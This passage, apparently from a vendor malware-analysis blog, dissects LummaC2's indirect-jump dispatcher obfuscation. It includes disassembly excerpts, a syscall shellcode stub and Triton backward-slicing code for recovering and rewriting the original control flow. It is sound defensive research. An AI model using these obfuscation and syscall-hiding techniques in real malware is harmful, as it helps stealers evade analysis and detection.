XOR CONSTANT2 with CONSTANT3 ; from the .data section 00416640 add eax, ecx ; ADD CONSTANT1 with the result 00416642 inc eax ; Increment the result 00416643 jmp eax ; Jump to the result</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 4: </span><span style="vertical-align: baseline;">Register-based instruction dispatcher</span></span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">By analyzing dispatcher blocks of this layout, we can derive some key characteristics of the protection. These blocks typically include </span><code><span style="vertical-align: baseline;">mov</span></code><span style="vertical-align: baseline;"> instructions to fetch a value from the malware's <code>.data</code></span><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">section or populate the register with a constant. Next, an </span><code><span style="vertical-align: baseline;">xor/lea</span></code><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">instruction and an <code>inc</code></span><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">instruction perform arithmetic operations on the retrieved values. Finally, the dispatcher block ends with a </span><code><span style="vertical-align: baseline;">jmp</span></code><span style="vertical-align: baseline;"> instruction to branch to the dynamically calculated value stored in a register.</span></p> <p><span style="vertical-align: baseline;">This final indirect jump obfuscates the function's original control flow. It breaks the control flow recovery algorithms of tools like IDA Pro which is unable to recover the jump destination statically, hindering both the disassembly and decompilation operations.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/lummac2-obfuscation-fig5.max-1000x1000.png" alt="IDA Pro&#x27;s disassembly and decompiler views of a protected subroutine"> </a> <figcaption class="article-image__caption "><p data-block-key="f6ha3">Figure 5: IDA Pro's disassembly and decompiler views of a protected subroutine</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">By identifying the common patterns within these dispatcher instructions, it's possible to differentiate them from the function's core instructions, which is crucial for lifting the protection and deobfuscating the function.</span></p> <p><span style="vertical-align: baseline;">Another observation is that the obfuscator produces duplicated original instructions when injecting its dispatcher instructions. Our assumption is that the obfuscator does not want to reallocate original instruction blocks when injecting the dispatcher code. As a result, it resolves this by copying those instructions to a new block at the destination.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>0041665A push 0FFFFFFF6h ; Duplicated instruction 0041665C call ds:GetStdHandle ; Duplicated instruction 00416662 call sub_41A4A0 ; Duplicated instruction 00416667 push 0FFFFFFF6h ; Original instruction. Last dispatcher ; block will jump here 00416669 call ds:GetStdHandle ; Original instruction of next block 0041666F call sub_41A4A0 ; Original instruction of next block 00416674 mov ecx, off_457CB0 ; Next dispatcher instructions 0041667A mov edx, 9148854h 0041667F xor edx, dword_457CB4 00416685 add ecx, edx 00416687 inc ecx 00416688 jmp ecx</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 6: Duplicated instructions between two dispatcher blocks</span></span></p></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Memory-based Dispatcher Layout</span></h3> <p><span style="vertical-align: baseline;">Memory-based dispatcher blocks appear significantly less frequently, as there are only 28 dispatchers of this type in the 2,009 blocks processed. Unlike the register-based layout, this layout relies on both registers and stack values for calculating and jumping to the destination. An example of this layout is shown in </span><span style="vertical-align: baseline;">Figure 7</span><span style="vertical-align: baseline;">, where the </span><code><span style="vertical-align: baseline;">add</span></code><span style="vertical-align: baseline;"> dispatcher instruction adds a value stored on the stack to a register.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>0044AA3A mov edi, [esi+50h] ; esi = esp in previous instruction 0044AA3D cmp edi, [esi+98h] 0044AA43 setb bl 0044AA46 mov edi, off_46C030[ebx*4] 0044AA4D add edi, [esi+9Ch] ; Dispatcher instruction. Adding a stack ; value to edi (jump destination) 0044AA53 mov ebx, [esi+0A0h] 0044AA59 jmp edi ; Jumping to edi </code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 7: </span><span style="vertical-align: baseline;">Dispatcher utilizing stack values to calculate the indirect jump's destination</span></span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">In a smaller number of cases, we encounter dispatcher blocks of this layout ending with a </span><code><span style="vertical-align: baseline;">jmp</span></code><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">instruction that does not branch to a register value. Instead, it utilizes a value stored on the stack to determine the jump target.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>0041CCB4 mov eax, [esi+5Ch] 0041CCB7 mov [eax], edi 0041CCB9 jmp dword ptr [esi+14h] ; Dispatcher jump to a stack value</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 8: </span><span style="vertical-align: baseline;">Dispatcher with memory-based indirect jump</span></span></p></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Mixed-order Dispatcher Layout</span></h3> <p><span style="vertical-align: baseline;">Mixed-order dispatcher layout is a variant of the register-based and memory-based dispatcher layouts. There are 12 memory-based and 28 register-based dispatcher blocks that fall into this mixed-order category.</span></p> <p><span style="vertical-align: baseline;">Most dispatcher instructions are placed at the tail of an original instruction or a sequence of original instructions. However, this can vary and parts of the dispatcher block can also be split up and randomly intertwined with the initial instructions. This unpredictable placement adds another layer of complexity to the deobfuscation process.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>Dispatcher instructions: 0041E847 mov eax, 0F5A88CDAh ; Dispatcher instruction 0041E84C xor eax, dword_459880 ; Dispatcher instruction 0041E852 mov ecx, off_459878 ; Dispatcher instruction 0041E858 add eax, ecx ; Dispatcher instruction 0041E85A inc eax ; Dispatcher instruction Original instructions: 0041E85B mov ebx, [esi+48h] 0041E85E mov ecx, [ebp+10h] 0041E861 mov [ebx], ecx 0041E863 mov edi, [esi+2Ch] 0041E866 mov ecx, [ebp+0Ch] 0041E869 mov [edi], ecx 0041E86B mov edi, [esi+0Ch] 0041E86E mov ecx, [esi+20h] 0041E871 mov dword ptr [edi], 0 0041E877 mov dword ptr [ecx], 0 0041E87D xorps xmm0, xmm0 0041E880 movups xmmword ptr [edx+4], xmm0 0041E884 movups xmmword ptr [edx+14h], xmm0 0041E888 movups xmmword ptr [edx+24h], xmm0 0041E88C mov dword ptr [edx+38h], 0 0041E893 mov dword ptr [edx+34h], 0 0041E89A mov dword ptr [edx], 3Ch 0041E8A0 mov dword ptr [edx+8], 0FFFFFFFFh 0041E8A7 mov dword ptr [edx+14h], 0FFFFFFFFh 0041E8AE mov dword ptr [edx+30h], 0FFFFFFFFh --------------------------------------------------- 0041E8B5 jmp eax ; Indirect jump</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 9: </span><span style="vertical-align: baseline;">Mixed-order dispatcher example</span></span></p></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Conditional Dispatcher</span></h3> <p><span style="vertical-align: baseline;">Conditional dispatchers deserve extra attention as they introduce more logic than unconditional ones. It is also important to note that all conditional branches are not subject to being obfuscated. We have identified 379 such instances within the case study sample that remain in their original state. These are leveraged in the context of tight loops and heavy string processing routines. They are likely left out of the protection scheme due to the severe performance degradation they induce.</span></p> <p><span style="vertical-align: baseline;">The structure of conditional dispatcher blocks exhibits a slight variation from that of unconditional dispatchers. Given that the intent is to protect conditional logic, there will always be two possible outcomes:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The branch that satisfies the condition being taken</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The fallthrough branch that does not satisfy the condition being taken</span></p> </li> </ul> <p><span style="vertical-align: baseline;">The obfuscator employs a table of paired entries for each conditional branch that is indexed given the result of the condition, which will either be true or false (0 or 1). Each index corresponds to one of the two branches that can be taken.</span></p> <p><span style="vertical-align: baseline;">Conditional dispatchers fall into three distinct categories.</span></p> <ol> <li role="presentation"><strong><span style="vertical-align: baseline;">Standard conditional logic</span></strong> <ul> <li role="presentation">The obfuscator accounts for all common<span style="vertical-align: baseline;"> conditional jump conditions</span></li> <li role="presentation">The condition code is evaluated using one of the following instructions: <ul> <li role="presentation"><code><span style="vertical-align: baseline;">test &lt;reg&gt;</span>, <span style="vertical-align: baseline;">&lt;reg&gt;</span></code></li> <li role="presentation"><code><span style="vertical-align: baseline;">cmp &lt;reg&gt;</span>,<span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">&lt;imm&gt;</span></code></li> </ul> </li> <li role="presentation"><a href="https://www.felixcloutier.com/x86/setcc" rel="noopener" target="_blank"><code><span style="text-decoration: underline; vertical-align: baseline;">setcc</span></code></a><span style="vertical-align: baseline;"> is then used to capture the original conditional jump logic. That is to say, every original conditional jump instruction is reflected as its </span><code><span style="vertical-align: baseline;">setcc</span></code><span style="vertical-align: baseline;"> counterpart (e.g., a </span><code><span style="vertical-align: baseline;">jnz</span></code><span style="vertical-align: baseline;"> becomes a </span><code><span style="vertical-align: baseline;">setnz</span></code><span style="vertical-align: baseline;">)</span></li> </ul> </li> <li role="presentation"><strong><span style="vertical-align: baseline;">Loop logic</span></strong> <ul> <li role="presentation">Non-infinite loops require conditional logic as a means of exiting the loop body. The obfuscator implements this using three distinct dispatcher blocks linked with an arbitrary subset of dispatcher blocks that represent the loop body <ul> <li role="presentation"><strong style="vertical-align: baseline;">Initialization block</strong> <ul> <li role="presentation">Initializes the default branch target via an "exit condition" flag that is always set to false (so that execution is transferred to the start of the loop body)</li> </ul> </li> <li role="presentation"><strong style="vertical-align: baseline;">Update block</strong> <ul> <li role="presentation">Updates the exit condition flag based on the processing of either the initialization block or logic stemming from the loop body</li> </ul> </li> <li role="presentation"><strong style="vertical-align: baseline;">Exit-check block</strong> <ul> <li role="presentation">Checks whether the exit condition flag is either set to exit the loop or transfer execution back to the loop body</li> </ul> </li> </ul> </li> </ul> </li> <li role="presentation"><strong style="vertical-align: baseline;">Syscall logic</strong> <ul> <li role="presentation">This category is specific to a LummaC2 component that invokes Windows syscalls and disguises how the resulting <code><span style="vertical-align: baseline;">NTSTATUS</span></code><span style="vertical-align: baseline;"> code is verified. This is effectively a conditional dispatcher that implements the </span><code><span style="vertical-align: baseline;">NT_SUCCESS</span></code><span style="vertical-align: baseline;"> macro.</span></li> <li role="presentation">The following instruction sequences are used to determine the success of a syscall by negating the returned <code><span style="vertical-align: baseline;">NTSTATUS</span></code><span style="vertical-align: baseline;"> and inspecting its sign value. A value of 1 indicates a successful syscall while 0 indicates a failed syscall.</span> <ul> <li role="presentation"><code><span style="vertical-align: baseline;">not eax</span></code></li> <li role="presentation"><code><span style="vertical-align: baseline;">shr eax, 0x1F</span></code></li> </ul> </li> </ul> </li> </ol> <h4><span style="vertical-align: baseline;">Standard Conditional Dispatcher Type</span></h4> <p><span style="vertical-align: baseline;">Continuing with using the case study sample from earlier, we find the standard conditional dispatcher type occurring 987 times out of the 1,063 conditional dispatchers.</span></p> <p><span style="vertical-align: baseline;">Figure 10 </span><span style="vertical-align: baseline;">and Figure 11</span><span style="vertical-align: baseline;"> illustrate this type where the conditional value is tested against both zero and a non-zero constant. The first figure shows the conditional value being compared to 0 using a </span><code><span style="vertical-align: baseline;">test</span></code><span style="vertical-align: baseline;"> instruction. The second shows the conditional value being evaluated against a non-zero constant </span><code><span style="vertical-align: baseline;">0x5A4D</span></code><span style="vertical-align: baseline;"> using a </span><code><span style="vertical-align: baseline;">cmp</span></code><span style="vertical-align: baseline;"> instruction.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>0041656E call sub_41C610 ; subroutine call at 0x41C610 00416573 mov esi, eax ; save set return value (eax) into esi 00416575 xor eax, eax ; clear out the index 00416577 test esi, esi ; evaluate the result 00416579 setnz al ; Set al if conditional value is not zero 0041657C mov eax, off_457CF4[eax*4] ; fetch appropriate encoded branch target 00416583 mov ecx, 0C09E0A35h ; start the decoding sequence 00416588 xor ecx, dword_457CFC 0041658E add eax, ecx 00416590 inc eax 00416591 jmp eax ; transfer execution to the decoded ; branch value</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 10: </span><span style="vertical-align: baseline;">Conditional dispatcher with the conditional value being compared to 0</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>0044DD15 movzx ecx, word ptr [edi] ; fetch the 16-bit value to evaluate 0044DD18 xor edx, edx ; clear out the index 0044DD1A cmp ecx, 5A4Dh ; compare to the 0x5A4D constant 0044DD20 setnz dl ; set the index to the result 0044DD23 mov ecx, off_46F304[edx*4] ; fetch appropriate encoded branch target 0044DD2A mov edx, 9EC9743Dh ; start the decoding sequence 0044DD2F xor edx, dword_46F30C 0044DD35 add ecx, edx 0044DD37 inc ecx 0044DD38 jmp ecx ; transfer execution to the decoded ; branch value </code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 11: </span><span style="vertical-align: baseline;">Conditional dispatcher with the conditional value being compared to a non-zero constant</span></span></p></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Loop Conditional Dispatcher Type</span></h4> <p><span style="vertical-align: baseline;">Figure 12, Figure 13 and Figure 14 provide an illustration of a loop conditional dispatcher type, which occurs 42 times within the sample. It is always a collection of linked dispatcher blocks that include the loop initialization sequence, the loop body (an arbitrary collection of dispatcher blocks specific to the loop logic), an update condition block, and finally a check-exit condition block.</span></p> <p><span style="vertical-align: baseline;">The initialization block sets the stage for a loop by establishing an "exit condition" flag and initializing it to false, ensuring the loop body executes at least once. The update block then modifies this flag based on the results of the initialization block or the loop body's logic. Finally, the exit-check block examines the flag's state to determine whether to continue iterating or exit the loop.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>0044CD55 mov dword_470A30, ebx 0044CD5B mov edi, [ebp-34h] 0044CD5E xchg ax, ax 0044CD60 mov eax, off_46CB3C 0044CD65 mov ecx, 74F906B5h 0044CD6A xor ecx, dword_46CB44 0044CD70 add eax, ecx 0044CD72 inc eax 0044CD73 mov dword ptr [ebp-30h], 0 0044CD7A mov dword ptr [ebp-18h], 0 ; conditional flag, initially 0 to ; reflect transfer to the loop body ; not the loop exit 0044CD81 mov dword ptr [ebp-28h], 0 0044CD88 mov dword ptr [ebp-40h], 0 0044CD8F jmp eax</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 12: A loop implementation block</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>0044C108 mov ecx, [ebp-5Ch] 0044C10B mov eax, [ecx+1] 0044C10E add eax, ecx 0044C110 add eax, 5 0044C113 mov [ebp-18h], eax ; instructions that update the ; conditional flag 0044C116 mov eax, off_46CFE4 0044C11B mov ecx, 681DADB7h 0044C120 xor ecx, dword_46CFEC 0044C126 add eax, ecx 0044C128 inc eax 0044C129 nop dword ptr [eax+00000000h] 0044C130 mov ecx, [ebp-18h] 0044C133 mov [ebp-28h], ecx 0044C136 jmp eax</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 13: </span><span style="vertical-align: baseline;">A update-block loop</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>0044C2AD xor eax, eax 0044C2AF mov edx, [ebp-18h] ; evaluate the conditional flag 0044C2B2 test edx, edx 0044C2B4 setnz al 0044C2B7 mov ecx, 27DC8BC9h 0044C2BC xor ecx, dword_46D248 0044C2C2 mov eax, off_46D240[eax*4] ; fetch the target 0044C2C9 add eax, ecx 0044C2CB inc eax 0044C2CC mov [ebp-28h], edx 0044C2CF mov ebx, [ebp-20h] 0044C2D2 jmp eax ; Jump back to a loop body block ; or exit the loop</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 14: </span><span style="vertical-align: baseline;">An exit-check block</span></span></p></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Syscall Conditional Dispatcher Type</span></h4> <p><span style="vertical-align: baseline;">Dispatchers of this type are used for checking the return values of LummaC2-specific function calls that perform a syscall. They appear only 34 times in the case study sample. In these functions, LummaC2 decrypts the shellcode in </span><span style="vertical-align: baseline;">Figure 15</span><span style="vertical-align: baseline;"> and executes it in memory to make a particular syscall.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>mov eax, &lt;syscall ID&gt; mov edx, win32u.Wow64SystemServiceCall call edx ret &lt;imm16&gt;</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 15: </span><span style="vertical-align: baseline;">Shellcode to call Windows system call</span></span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">In other cases, the malware makes direct calls to Windows Native APIs instead of utilizing the shellcode in Figure 15.</span></p> <p><span style="vertical-align: baseline;">The conditional dispatcher for this type implements the </span><code><span style="vertical-align: baseline;">NT_SUCCESS</span></code><span style="vertical-align: baseline;"> macro by checking whether the returned </span><code><span style="vertical-align: baseline;">NTSTATUS</span></code><span style="vertical-align: baseline;"> code is successful or not. This is done via checking the sign of the inverted </span><code><span style="vertical-align: baseline;">NTSTATUS</span></code><span style="vertical-align: baseline;"> code and capturing it as the branch target index, which will either be 0 or 1. Given that a successful </span><code><span style="vertical-align: baseline;">NTSTATUS</span></code><span style="vertical-align: baseline;"> code is always a 32-bit zero value, a successful syscall will result in the true branch (index 1) being taken, and a failed syscall will result in the false branch (index 0) being taken.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>00424D95 call sub_44EDA0 ; wrapper function to perform a syscall 00424D9A add esp, 0Ch 00424D9D not eax ; negate all bits of the NTSTATUS return value 00424D9F shr eax, 1Fh ; isolate the sign bit to capture the ; result and in turn, the index to ; the according branch 00424DA2 mov eax, off_45DC9C[eax*4] ; fetch the according branch target 00424DA9 mov ecx, 31637ACh 00424DAE xor ecx, dword_45DCA4 00424DB4 add eax, ecx 00424DB6 inc eax 00424DB7 jmp eax</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 16: </span><span style="vertical-align: baseline;">Conditional dispatcher to check syscall return values</span></span></p></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Obfuscated Function Recovery</span></h2> <h3><span style="vertical-align: baseline;">Original Instruction Recovery </span></h3> <p><span style="vertical-align: baseline;">Recovering the original control flow of a protected function requires us to differentiate between the obfuscator's injected dispatcher instructions and the function's original instructions. To solve this, we decide to use symbolic backward slicing, a program analysis technique that identifies instructions that influence a specific register or memory address at a given point within a simulated execution on an intermediate representation. In this context, we employ backward slicing to do the following:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Isolate the dispatcher instructions from the original instructions</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Determine which explicit instructions calculate the final indirect transfer of control</span></p> </li> </ul> <p><span style="vertical-align: baseline;">In our deobfuscator design, we leverage the </span><a href="https://triton-library.github.io/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Triton</span></a><span style="vertical-align: baseline;"> symbolic execution engine to conduct the core of the recovery. Triton implements </span><a href="https://github.com/JonathanSalwan/Triton/blob/master/src/examples/python/backward_slicing.py" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">backward tracing APIs</span></a><span style="vertical-align: baseline;"> that we can use directly. When executing the program, Triton maintains a set of symbolic expressions that represent the values of registers and memory addresses. These expressions are stored as an Abstract Syntax Tree (AST), where each tree node represents an operation with operands that result from the execution flow. Triton refers to this implementation as "processing," which is the result of simulating the memory effects a culmination of emulated instructions produce and reflecting that result as an AST.</span></p> <p><span style="vertical-align: baseline;">This is a powerful abstraction that allows us to reason about the deobfuscation at an AST level and ignore the verbose disassembly produced by the obfuscator. </span></p> <p><span style="vertical-align: baseline;">To distinguish dispatcher instructions, we'll focus on the destination of the final indirect jump in a dispatcher block. By looking up this destination in the constructed ASTs after all dispatcher instructions are processed, we can extract its corresponding symbolic expressions. </span></p> <p><span style="vertical-align: baseline;">Figure 17</span><span style="vertical-align: baseline;"> shows the AST of the destination register </span><code><span style="vertical-align: baseline;">eax</span></code><span style="vertical-align: baseline;"> at an indirect jump. This AST represents all symbolic expressions from the result of the symbolic processing of the corresponding instructions that influence the value of the destination register before the indirect jump is executed.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/lummac2-obfuscation-fig17.max-1000x1000.png" alt="ASTs of the destination register after the indirect jump instruction is processed"> </a> <figcaption class="article-image__caption "><p data-block-key="s2elm">Figure 17: ASTs of the destination register after the indirect jump instruction is processed</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Using Triton's APIs, we can extract a subset (or slice) of the processed expressions that collectively contribute to the final destination address of an indirect jump. For each expression in the slice, we can map it back to the specific dispatcher instruction that generates it. This mapping is possible because Triton maintains the association between instructions and the symbolic expressions they produce during its execution.</span></p> <p><span style="vertical-align: baseline;">A snippet of the code used to perform backward slicing to distinguish dispatcher instructions from the original ones is shown in </span><span style="vertical-align: baseline;">Figure 18</span><span style="vertical-align: baseline;">.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code># Retrieve the bytes of the instruction at the current program counter instructionBytes = context.getConcreteMemoryAreaValue(pc, 16) # Create a Triton Instruction object from the retrieved bytes instruction = Instruction(pc, instructionBytes) # Process the instruction using the Triton context context.processing(instruction) # Scan for dispatcher jump instruction if instruction.getType() == OPCODE.X86.JMP: # Extract the operand of the JMP instruction jmpOperand = instruction.getOperands()[0] # Process JMP instructions with register operand only if jmpOperand.getType() == OPERAND.REG: # Get symbolic expression of destination register destRegExpression = context.getSymbolicRegisters()[jmpOperand.getId()] # Backward slice on the destination register slicing = context.sliceExpressions(destRegExpression) # Iterating through the slices for _, sliceInstr in sorted(slicing.items()): # Print out the disassembled instruction of each slice sliceInstrDisassembly = sliceInstr.getDisassembly() print('\t[Slice]', sliceInstrDisassembly)</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 18: </span><span style="vertical-align: baseline;">Triton code to perform backward slicing to recover all dispatcher instructions</span></span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Here, we continuously execute instructions until a <code>jmp</code></span><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">instruction is encountered. If the instruction's operand is a register, we retrieve its set of symbolic expressions and perform a backward slice to recover all instructions that influenced its result. Triton allows us to further preserve the original disassembly given a set of symbolic expressions that we leverage to extract the exact dispatcher instructions that produce the slice, and not merely the AST representation.</span></p> <p><span style="vertical-align: baseline;">Once the complete backward slice for the destination has been retrieved, we can confidently distinguish the dispatcher instructions from the original instructions within the function. This distinction holds true regardless of the placement or order of the dispatcher instructions within a protected block since the backward slice only monitors those instructions that directly influence the final value.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>Backward slicing output: ... [Processing] 0x416530: lea eax, [esp + 8] [Processing] 0x416534: push eax [Processing] 0x416535: call dword ptr [0x454a18] [Processing] 0x41653b: mov eax, esp [Processing] 0x41653d: push eax [Processing] 0x41653e: call dword ptr [0x454a14] [Processing] 0x416544: mov eax, dword ptr [0x457c1c] [Processing] 0x416549: mov ecx, 0xa15bd01f [Processing] 0x41654e: xor ecx, dword ptr [0x457c24] [Processing] 0x416554: add eax, ecx [Processing] 0x416556: inc eax [Processing] 0x416557: jmp eax [Slice] 0x416544: mov eax, dword ptr [0x457c1c] [Slice] 0x416549: mov ecx, 0xa15bd01f [Slice] 0x41654e: xor ecx, dword ptr [0x457c24] [Slice] 0x416554: add eax, ecx [Slice] 0x416556: inc eax ...</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 19: </span><span style="vertical-align: baseline;">Output for the code in </span><span style="vertical-align: baseline;">Figure 18</span><span style="vertical-align: baseline;"> to distinguish dispatcher instructions</span></span></p></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Control Flow Recovery</span></h3> <p><span style="vertical-align: baseline;">In addition to recovering all original instructions of the function, we must also recover the original control flow. While instructions are processed dynamically, Triton allows us to determine the concrete destination value of the final indirect jump in the dispatcher block. With this, we can trace the program's execution flow and reconstruct the order in which dispatcher blocks are executed.</span></p> <p><span style="vertical-align: baseline;">To explore all possible execution paths within the function, we employ a depth-first search (DFS) traversal algorithm. </span></p> <p><span style="vertical-align: baseline;">We begin by exploring a single path, following the control flow dictated by the obfuscator's indirect jumps. This continues until the path reaches a termination point, such as a <code>ret</code></span><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">instruction or a program-ending API call (e.g., </span><code><span style="vertical-align: baseline;">ExitProcess</span></code><span style="vertical-align: baseline;">).</span></p> <p><span style="vertical-align: baseline;">In our deobfuscator design, we default to viewing all of these protected jumps as <code>jnz</code></span><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">instructions by forcing the index register to be 1 in the main execution path being processed. When encountering a protected conditional jump, we assume the condition is met and continue exploring the path that follows the jump. However, we don't discard the alternative path. The alternative path is stored in a queue-like data structure. This allows us to revisit these paths later when we've exhausted all possibilities on the current path.</span></p> <p><span style="vertical-align: baseline;">By systematically exploring all paths using DFS and handling conditional jumps strategically, we can reconstruct the original control flow that has been obfuscated with the compiler's indirect jumps.</span></p> <h2><span style="vertical-align: baseline;">Deobfuscation: Rebuilding Original Function</span></h2> <p><span style="vertical-align: baseline;">With the original instructions and execution paths identified, we can deobfuscate the sample by rebuilding the functions we have processed. Our goal is to ensure the deobfuscated functions are restored to their original state, preserving their original semantics and removing all traces of the obfuscator.</span></p> <h3><span style="vertical-align: baseline;">Instruction Rewriting</span></h3> <p><span style="vertical-align: baseline;">When rebuilding, we can overwrite the original protected function with the deobfuscated instructions. Since a deobfuscated function always has fewer instructions than an obfuscated function, there is guaranteed space to accommodate the rebuilt function. The remaining space can be padded with standard compiler padding instructions like <code>0xCC</code></span><strong style="vertical-align: baseline;">.</strong></p> <p><span style="vertical-align: baseline;">The rewriting process involves writing instructions back from the function's entry point in the order they are processed and executed during the Triton analysis, excluding all dispatcher instructions. Here, we will address two specific cases involving indirect jumps originally added by the obfuscator.</span></p> <p><span style="vertical-align: baseline;">The first case involves processing an unconditional dispatcher block. For this case, if the jump target has not been written yet, we simply skip it and continue writing instructions sequentially. If the jump target has already been written, we replace the indirect jump with a direct one to branch back to that target.</span></p> <p><span style="vertical-align: baseline;">The second case for handling the jump instruction of a conditional dispatcher block is a bit more convoluted. Before tackling this, we must determine the original conditional jump type (e.g., </span><code><span style="vertical-align: baseline;">jz</span></code><span style="vertical-align: baseline;">,</span><strong style="vertical-align: baseline;"> </strong><code><span style="vertical-align: baseline;">jnz</span></code><span style="vertical-align: baseline;">, </span><code><span style="vertical-align: baseline;">jl</span></code><span style="vertical-align: baseline;">) based on the preceding </span><code><span style="vertical-align: baseline;">setcc</span></code><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">dispatcher instruction.</span></p> <p><span style="vertical-align: baseline;">Since the indirect jump can target one of the two destinations given a condition, we must replace it with two instructions. The first instruction is a conditional jump to the first destination using the correct conditional jump type.</span></p> <p><span style="vertical-align: baseline;">The second instruction can be either:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">A conditional jump with the opposite type as the first, targeting the second destination.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">A direct jump to the second destination. This is chosen for simplicity of our deobfuscator implementation.</span></p> </li> </ul></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>0041652B call sub_4455F0 ; original instruction 00416530 movzx eax, al ; eax = al = return value 00416533 test eax, eax ; set flags 00416535 jnz loc_416540 ; replacing indirect jmp with jnz for the first path 0041653B jmp loc_416554 ; insert a jmp for the second path</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 20: </span><span style="vertical-align: baseline;">Replacing an indirect conditional jump with a </span><code><span style="vertical-align: baseline;">jnz-jmp</span></code><span style="vertical-align: baseline;"> instruction pair</span></span></p></div> <div class="block-paragraph_advanced"><h3><span 